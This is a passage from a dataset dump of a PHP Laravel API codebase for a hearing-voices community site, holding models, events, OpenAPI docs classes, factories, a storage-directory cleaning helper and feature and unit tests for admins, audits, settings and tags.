);\n\n $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n $this->assertDatabaseMissing('admins', ['id' => $admin->id]);\n $this->assertDatabaseMissing('users', ['id' => $admin->user->id]);\n $this->assertDatabaseMissing('audits', ['id' => $audit->id]);\n $this->assertDatabaseMissing('notifications', ['id' => $notification->id]);\n $this->assertDatabaseMissing('file_tokens', ['id' => $fileToken->id]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_destroy(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->deleteJson(\"/v1/admins/{$admin->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($admin, $user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_DELETE\n && $event->getDescription() === \"Deleted admin [{$admin->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.552830159664154,
"alphanum_fraction": 0.5754716992378235,
"avg_line_length": 24.238094329833984,
"blob_id": "6c8f9bc04f123849d321fef50e42fdbac0517248",
"content_id": "b9ec78e527aeacd28f4273940c61cc8956a63ed2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 530,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 21,
"path": "/database/factories/AdminFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\Admin;\nuse App\\Models\\User;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Facades\\Date;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(Admin::class, function (Faker $faker): array {\n return [\n 'user_id' => function () {\n return factory(User::class)->create([\n 'email_verified_at' => Date::now(),\n ])->id;\n },\n 'name' => $faker->firstName,\n 'phone' => '07000000000',\n ];\n});\n"
},
{
"alpha_fraction": 0.596759021282196,
"alphanum_fraction": 0.5969939231872559,
"avg_line_length": 21.52910041809082,
"blob_id": "ac3702ada880ea09f89760369dcf370a8e1608db",
"content_id": "6104ebf9700ec8acb7da0f34b5a7f883a3d557ed",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4258,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 189,
"path": "/app/Events/EndpointInvoked.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events;\n\nuse App\\Models\\Audit;\nuse App\\Models\\User;\nuse Carbon\\CarbonImmutable;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Queue\\SerializesModels;\nuse Illuminate\\Support\\Facades\\Date;\nuse Laravel\\Passport\\Client;\n\nclass EndpointInvoked\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\User|null\n */\n protected $user;\n\n /**\n * @var \\Laravel\\Passport\\Client|null\n */\n protected $client;\n\n /**\n * @var string\n */\n protected $action;\n\n /**\n * @var string\n */\n protected $description;\n\n /**\n * @var string\n */\n protected $ipAddress;\n\n /**\n * @var string|null\n */\n protected $userAgent;\n\n /**\n * @var \\Carbon\\CarbonImmutable\n */\n protected $createdAt;\n\n /**\n * EndpointInvoked constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param string $action\n * @param string $description\n */\n protected function __construct(Request $request, string $action, string $description)\n {\n $this->user = $request->user('api');\n $this->client = optional($this->user)->token()->client ?? null;\n $this->action = $action;\n $this->description = $description;\n $this->ipAddress = $request->ip();\n $this->userAgent = $request->userAgent() ?: null;\n $this->createdAt = Date::now();\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onLogin(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_LOGIN, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onLogout(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_LOGOUT, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onCreate(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_CREATE, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onRead(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_READ, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onUpdate(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_UPDATE, $description);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param string $description\n * @return \\App\\Events\\EndpointInvoked\n */\n public static function onDelete(Request $request, string $description): self\n {\n return new static($request, Audit::ACTION_DELETE, $description);\n }\n\n /**\n * @return \\App\\Models\\User|null\n */\n public function getUser(): ?User\n {\n return $this->user;\n }\n\n /**\n * @return \\Laravel\\Passport\\Client|null\n */\n public function getClient(): ?Client\n {\n return $this->client;\n }\n\n /**\n * @return string\n */\n public function getAction(): string\n {\n return $this->action;\n }\n\n /**\n * @return string\n */\n public function getDescription(): string\n {\n return $this->description;\n }\n\n /**\n * @return string\n */\n public function getIpAddress(): string\n {\n return $this->ipAddress;\n }\n\n /**\n * @return string|null\n */\n public function getUserAgent(): ?string\n {\n return $this->userAgent;\n }\n\n /**\n * @return \\Carbon\\CarbonImmutable\n */\n public function getCreatedAt(): CarbonImmutable\n {\n return $this->createdAt;\n }\n}\n"
},
{
"alpha_fraction": 0.6434231400489807,
"alphanum_fraction": 0.6450079083442688,
"avg_line_length": 24.239999771118164,
"blob_id": "8b0bfd1816a37742bc5bd8886e9fd5cd50783d12",
"content_id": "14e0ba82466a33a77000f29190991cd1746bccc5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 631,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 25,
"path": "/app/Docs/Schemas/Setting/EmailContentSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Setting;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass EmailContentSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('subject'),\n Schema::string('body')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5632065534591675,
"alphanum_fraction": 0.568345308303833,
"avg_line_length": 27.617647171020508,
"blob_id": "74670eb314cc8ea6f66084179c2064344b84e38f",
"content_id": "d052009593ce387a85823000413c638e5d0cd357",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 973,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 34,
"path": "/app/Http/Resources/AuditResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Audit $resource\n */\nclass AuditResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'admin_id' => $this->resource->user->admin->id ?? null,\n 'end_user_id' => $this->resource->user->endUser->id ?? null,\n 'client' => $this->resource->client->name ?? null,\n 'action' => $this->resource->action,\n 'description' => $this->resource->description,\n 'ip_address' => $this->resource->ip_address,\n 'user_agent' => $this->resource->user_agent,\n 'created_at' => $this->resource->created_at->toIso8601String(),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6728395223617554,
"alphanum_fraction": 0.6790123581886292,
"avg_line_length": 19.25,
"blob_id": "d6b422d92dc26e70e90332d179a8f142e3e2088f",
"content_id": "094429d1f8e719bedbbae9a38cd83f9c30f5e3ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 162,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 8,
"path": "/resources/js/docs.js",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "import SwaggerUI from 'swagger-ui';\n\nSwaggerUI({\n dom_id: '#swagger-ui',\n url: '/docs/openapi.json',\n defaultModelsExpandDepth: -1,\n docExpansion: 'none'\n});\n"
},
{
"alpha_fraction": 0.5464247465133667,
"alphanum_fraction": 0.5474919676780701,
"avg_line_length": 23.657894134521484,
"blob_id": "58d0af5d95d4da83ca0077006e2208a256feaea1",
"content_id": "f0adc8348edf5e709377d0470778dfec3d750f78",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 937,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 38,
"path": "/app/Support/Filesystem.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Support;\n\nuse App\\Exceptions\\RiskyPathException;\nuse Illuminate\\Support\\Str;\n\nclass Filesystem\n{\n /**\n * @param string $dir\n * @param string[] $excludes\n */\n public function clearDir(string $dir, array $excludes = []): void\n {\n // Safety precaution to ensure that only directories within the app can be cleared.\n if (!Str::startsWith($dir, storage_path())) {\n throw new RiskyPathException($dir);\n }\n\n // Don't do anything if the directory doesn't exist.\n if (!is_dir($dir)) {\n return;\n }\n\n $files = array_diff(\n scandir($dir),\n array_merge(['.', '..'], $excludes)\n );\n\n foreach ($files as $file) {\n $filePath = sprintf('%s/%s', $dir, $file);\n is_dir($filePath) ? $this->clearDir($filePath, $excludes) : unlink($filePath);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5313174724578857,
"alphanum_fraction": 0.5385169386863708,
"avg_line_length": 20.045454025268555,
"blob_id": "a48179a84f6e985f2d738f39e21d8667d567cfdc",
"content_id": "87f42624f7ec777167584309f0350cef53d3c90a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1389,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 66,
"path": "/tests/Unit/Support/PaginationTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Support;\n\nuse App\\Support\\Pagination;\nuse Tests\\TestCase;\n\nclass PaginationTest extends TestCase\n{\n /** @test */\n public function ten_returns_ten(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n 10,\n $pagination->perPage(10)\n );\n }\n\n /** @test */\n public function one_returns_one(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n 1,\n $pagination->perPage(1)\n );\n }\n\n /** @test */\n public function max_returns_max(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n (int)config('connecting_voices.pagination.max'),\n $pagination->perPage((int)config('connecting_voices.pagination.max'))\n );\n }\n\n /** @test */\n public function zero_returns_one(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n 1,\n $pagination->perPage(0)\n );\n }\n\n /** @test */\n public function one_more_than_max_returns_max(): void\n {\n $pagination = new Pagination();\n\n $this->assertEquals(\n (int)config('connecting_voices.pagination.max'),\n $pagination->perPage((int)config('connecting_voices.pagination.max') + 1)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5267123579978943,
"alphanum_fraction": 0.5383561849594116,
"avg_line_length": 28.200000762939453,
"blob_id": "c4dbefc8992b6455a2cba254e758484e3bb849e4",
"content_id": "4bc83c337caaed7b50ff25b460de5b4345577f1a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1460,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 50,
"path": "/app/Http/Requests/EndUser/StoreEndUserRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\EndUser;\n\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Support\\Facades\\Config;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Validation\\Rule;\n\nclass StoreEndUserRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'email' => ['bail', 'required', 'email', 'max:255', 'unique:users'],\n 'password' => ['bail', 'required', 'string', 'min:1', 'max:255'],\n 'country' => ['bail', 'string', 'max:255'],\n 'birth_year' => [\n 'bail',\n 'integer',\n Rule::min(Date::today()->year - Config::get('connecting_voices.age_requirement.max')),\n Rule::max(Date::today()->year - Config::get('connecting_voices.age_requirement.min')),\n ],\n 'gender' => ['bail', 'string', 'max:255'],\n 'ethnicity' => ['bail', 'string', 'max:255'],\n ];\n }\n\n /**\n * Get custom messages for validator errors.\n *\n * @return array\n */\n public function messages()\n {\n return [\n 'email.unique' => sprintf(\n 'The account has been withdrawn. Please contact the admin team via %s for more info.',\n config('connecting_voices.admin_email')\n ),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5650460124015808,
"alphanum_fraction": 0.5698642134666443,
"avg_line_length": 31.154930114746094,
"blob_id": "ff6401e1bba2987cf80ce388a0e9b6ddaff17f50",
"content_id": "0ca59f4233060a15a26db9fcab3ea8ebf458f780",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2283,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 71,
"path": "/tests/Unit/Services/AuditServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Audit\\AuditCreated;\nuse App\\Models\\Audit;\nuse App\\Services\\AuditService;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass AuditServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_an_audit_record(): void\n {\n /** @var \\App\\Services\\AuditService $auditService */\n $auditService = resolve(AuditService::class);\n\n $ipAddress = $this->faker->ipv4;\n $userAgent = $this->faker->userAgent;\n $createdAt = Date::now();\n\n $audit = $auditService->create([\n 'user_id' => null,\n 'client_id' => null,\n 'action' => Audit::ACTION_CREATE,\n 'description' => 'Lorem ipsum',\n 'ip_address' => $ipAddress,\n 'user_agent' => $userAgent,\n 'created_at' => $createdAt,\n ]);\n\n $this->assertDatabaseHas('audits', ['id' => $audit->id]);\n $this->assertEquals(null, $audit->user_id);\n $this->assertEquals(null, $audit->client_id);\n $this->assertEquals(Audit::ACTION_CREATE, $audit->action);\n $this->assertEquals('Lorem ipsum', $audit->description);\n $this->assertEquals($ipAddress, $audit->ip_address);\n $this->assertEquals($userAgent, $audit->user_agent);\n $this->assertEquals($createdAt->toIso8601String(), $audit->created_at->toIso8601String());\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([AuditCreated::class]);\n\n /** @var \\App\\Services\\AuditService $auditService */\n $auditService = resolve(AuditService::class);\n\n $audit = $auditService->create([\n 'user_id' => null,\n 'client_id' => null,\n 'action' => Audit::ACTION_CREATE,\n 'description' => 'Lorem ipsum',\n 'ip_address' => $this->faker->ipv4,\n 'user_agent' => $this->faker->userAgent,\n 'created_at' => Date::now(),\n ]);\n\n Event::assertDispatched(\n AuditCreated::class,\n function (AuditCreated $event) use ($audit): bool {\n return $event->getAudit()->is($audit);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.46759653091430664,
"alphanum_fraction": 0.4677666127681732,
"avg_line_length": 40.40140914916992,
"blob_id": "eb2cb89b4671f7343b4328d4e7f9f542e5f2f087",
"content_id": "7f05ce93141c750288b71eee47111de0c902d70f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 5879,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 142,
"path": "/tests/Unit/Services/SettingServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Setting\\SettingsUpdated;\nuse App\\Services\\SettingService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Tests\\TestCase;\n\nclass SettingServiceTest extends TestCase\n{\n /** @test */\n public function it_updates_the_settings(): void\n {\n /** @var \\App\\Services\\SettingService $settingService */\n $settingService = resolve(SettingService::class);\n\n $settings = $settingService->update([\n 'frontend_content' => [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ],\n 'email_content' => [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ],\n ]);\n\n $this->assertEquals($settings->find('frontend_content')->value, [\n 'home_page' => [\n 'title' => 'frontend_content/home_page/title',\n ],\n ]);\n $this->assertEquals($settings->find('email_content')->value, [\n 'admin' => [\n 'new_contribution' => [\n 'subject' => 'email_content/admin/new_contribution/subject',\n 'body' => 'email_content/admin/new_contribution/body',\n ],\n 'updated_contribution' => [\n 'subject' => 'email_content/admin/updated_contribution/subject',\n 'body' => 'email_content/admin/updated_contribution/body',\n ],\n 'new_end_user' => [\n 'subject' => 'email_content/admin/new_end_user/subject',\n 'body' => 'email_content/admin/new_end_user/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/admin/password_reset/subject',\n 'body' => 'email_content/admin/password_reset/body',\n ],\n ],\n 'end_user' => [\n 'email_confirmation' => [\n 'subject' => 'email_content/end_user/email_confirmation/subject',\n 'body' => 'email_content/end_user/email_confirmation/body',\n ],\n 'password_reset' => [\n 'subject' => 'email_content/end_user/password_reset/subject',\n 'body' => 'email_content/end_user/password_reset/body',\n ],\n 'contribution_approved' => [\n 'subject' => 'email_content/end_user/contribution_approved/subject',\n 'body' => 'email_content/end_user/contribution_approved/body',\n ],\n 'contribution_rejected' => [\n 'subject' => 'email_content/end_user/contribution_rejected/subject',\n 'body' => 'email_content/end_user/contribution_rejected/body',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_updated(): void\n {\n Event::fake([SettingsUpdated::class]);\n\n /** @var \\App\\Services\\SettingService $settingService */\n $settingService = resolve(SettingService::class);\n\n $settings = $settingService->update([]);\n\n Event::assertDispatched(\n SettingsUpdated::class,\n function (SettingsUpdated $event) use ($settings): bool {\n foreach ($event->getSetting() as $eventSetting) {\n /** @var \\App\\Models\\Setting $eventSetting */\n /** @var \\App\\Models\\Setting|null $setting */\n $setting = $settings->firstWhere('key', $eventSetting->key);\n\n if ($setting === null) {\n return false;\n }\n\n if ($setting->isNot($eventSetting)) {\n return false;\n }\n }\n\n return true;\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6203446388244629,
"alphanum_fraction": 0.6209005117416382,
"avg_line_length": 34.27450942993164,
"blob_id": "ff35c441106d6395f9b7e34457e7ff11cd736c90",
"content_id": "473e3c3bf849bf3372608e6c85d2d386cb76aeb4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1799,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 51,
"path": "/app/Docs/Operations/Contributions/ShowContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Schemas\\Contribution\\ContributionSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass ShowContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('Get a specific contribution')\n ->description(\n Utils::operationDescription(\n ['Public', Admin::class, EndUser::class],\n <<<'EOT'\n * If accessed by the public, then only public contributions will be accessible.\n * If access by an end user, then only public contributions and all of their own\n will be accessible.\n EOT\n )\n )\n ->tags(ContributionsTag::create())\n ->noSecurity()\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, ContributionSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6408977508544922,
"alphanum_fraction": 0.6417289972305298,
"avg_line_length": 26.976743698120117,
"blob_id": "14a64df61bbe1a721f60ffb9ea98acf4535a07c6",
"content_id": "96fea4ea95ba018e5c95ed6161d02ad35bcfa58d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1203,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 43,
"path": "/database/factories/ContributionFactory.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse Faker\\Generator as Faker;\nuse Illuminate\\Support\\Facades\\Date;\n\n/** @var \\Illuminate\\Database\\Eloquent\\Factory $factory */\n$factory->define(Contribution::class, function (Faker $faker): array {\n return [\n 'end_user_id' => function (): string {\n return factory(EndUser::class)->create()->id;\n },\n 'content' => $faker->paragraph,\n 'status' => Contribution::STATUS_PUBLIC,\n 'status_last_updated_at' => Date::now(),\n ];\n});\n\n$factory->state(Contribution::class, Contribution::STATUS_PUBLIC, [\n 'status' => Contribution::STATUS_PUBLIC,\n]);\n\n$factory->state(Contribution::class, Contribution::STATUS_PRIVATE, [\n 'status' => Contribution::STATUS_PRIVATE,\n]);\n\n$factory->state(Contribution::class, Contribution::STATUS_IN_REVIEW, [\n 'status' => Contribution::STATUS_IN_REVIEW,\n]);\n\n$factory->state(\n Contribution::class,\n Contribution::STATUS_CHANGES_REQUESTED,\n function (Faker $faker): array {\n return [\n 'status' => Contribution::STATUS_CHANGES_REQUESTED,\n 'changes_requested' => $faker->paragraph,\n ];\n }\n);\n"
},
{
"alpha_fraction": 0.6746370792388916,
"alphanum_fraction": 0.6763449907302856,
"avg_line_length": 25.0222225189209,
"blob_id": "623bd424b32f44b2981aafa5caec7d1ac5534a82",
"content_id": "df5ec8ed8e9c1da6597206b4de487d32909710cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1171,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 45,
"path": "/app/Http/Controllers/V1/Admin/MeController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\Admin;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Resources\\AdminResource;\nuse App\\Models\\Admin;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\nclass MeController extends ApiController\n{\n /**\n * MeController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware('auth:api');\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(Request $request): JsonResource\n {\n $this->authorize('me', Admin::class);\n\n $admin = $request->user('api')->admin;\n\n event(EndpointInvoked::onRead($request, \"Viewed admin [{$admin->id}].\"));\n\n return new AdminResource($admin);\n }\n}\n"
},
{
"alpha_fraction": 0.4872399866580963,
"alphanum_fraction": 0.49295249581336975,
"avg_line_length": 27.403879165649414,
"blob_id": "cac8f67b3258e36063657ff9c89db125eaa8aca5",
"content_id": "6b22fa6b55ead2db2c05486c70709e3e1a792afe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 16105,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 567,
"path": "/tests/Feature/V1/TagControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Tag;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass TagControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_can_index(): void\n {\n $response = $this->getJson('/v1/tags');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function end_user_can_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/tags');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/tags');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n {\n $response = $this->getJson('/v1/tags');\n\n $response->assertJsonStructure([\n 'data' => [\n '*' => [\n 'id',\n 'parent_tag_id',\n 'name',\n 'public_contributions_count',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ],\n ],\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n /** @var \\App\\Models\\Tag $tag */\n $tag = factory(Tag::class)->create();\n\n $response = $this->getJson('/v1/tags');\n\n $response->assertJsonFragment([\n [\n 'id' => $tag->id,\n 'parent_tag_id' => $tag->parent_tag_id,\n 'name' => $tag->name,\n 'public_contributions_count' => $tag->publicContributions()->count(),\n 'created_at' => $tag->created_at->toIso8601String(),\n 'updated_at' => $tag->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ],\n ]);\n }\n\n /** @test */\n public function can_sort_by_name_for_index(): void\n {\n $this->truncateTables('tags');\n\n $tag1 = factory(Tag::class)->create([\n 'name' => 'Alpha',\n ]);\n $tag2 = factory(Tag::class)->create([\n 'name' => 'Bravo',\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/tags', ['sort' => '-name']);\n\n $response->assertNthIdInCollection(1, $tag1->id);\n $response->assertNthIdInCollection(0, $tag2->id);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/tags');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && 